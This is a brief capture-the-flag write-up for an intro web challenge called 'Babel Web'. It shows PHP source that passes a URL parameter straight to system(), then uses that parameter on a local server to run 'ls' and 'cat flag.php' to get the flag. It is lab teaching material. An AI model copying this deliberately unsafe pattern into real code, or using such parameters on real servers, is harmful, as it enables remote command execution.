Writeup by NiveusEmi for Babel Web

intro web

January 2, 2025

  1. Look at the web page source code, we can find a hidden link with a parameter in the url ?source=1, let’s go to it
  2. The source code is displayed in the page
if (isset($_GET['source'])) {
    @show_source(__FILE__);
}  else if(isset($_GET['code'])) {
    print("<pre>");
    @system($_GET['code']);
    print("<pre>");
} else {
  1. With a closer look, the code parameter can be used with the GETmethod (aka direct in url)
  2. The value of this parameter is executed using the system PHP function, so we can use it to execute commands on the server
  3. Try the ls command to see what’s on the server: http://localhost:8000?code=ls

The output shows two files:

flag.php
index.php
  1. flag.php seems interesting, let’s see its content using the command cat flag.php
  2. Have a look on the source code of the returned page ;)